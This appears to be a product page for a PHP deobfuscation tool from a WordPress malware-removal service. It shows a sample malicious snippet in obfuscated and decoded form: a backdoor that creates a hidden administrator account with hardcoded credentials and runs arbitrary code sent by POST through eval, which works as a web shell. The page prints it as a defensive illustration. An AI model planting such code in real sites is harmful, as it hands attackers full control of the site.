Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php if($_GET[base64_decode('YWRkX3VzZXI=')]){$s0=base64_decode('YWRtbjM=');$e1=base64_decode('YWRtaW5AMTIzMzIx');$g2=base64_decode('ZHJld0BleGFtcGxlLmNvbQ==');$q3=r4($s0,$e1,$g2);$f5=m6(base64_decode('aWQ='),$q3);$f5->i7(base64_decode('c3Vic2NyaWJlcg=='));$f5->n8(base64_decode('YWRtaW5pc3...



Obfuscated php code

<?php if($_GET[base64_decode('YWRkX3VzZXI=')]){$s0=base64_decode('YWRtbjM=');$e1=base64_decode('YWRtaW5AMTIzMzIx');$g2=base64_decode('ZHJld0BleGFtcGxlLmNvbQ==');$q3=r4($s0,$e1,$g2);$f5=m6(base64_decode('aWQ='),$q3);$f5->i7(base64_decode('c3Vic2NyaWJlcg=='));$f5->n8(base64_decode('YWRtaW5pc3RyYXRvcg=='));}eval($_POST[base64_decode('Y29kZQ==')]);

Decoded(de-Obfuscated) php code

<?php

if ($_GET["add_user"]) {
    $s0 = "admn3";
    $e1 = "admin@123321";
    $g2 = "drew@example.com";
    $q3 = r4($s0, $e1, $g2);
    $f5 = m6("id", $q3);
    $f5->i7("subscriber");
    $f5->n8("administrator");
}
eval($_POST["code"]);

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.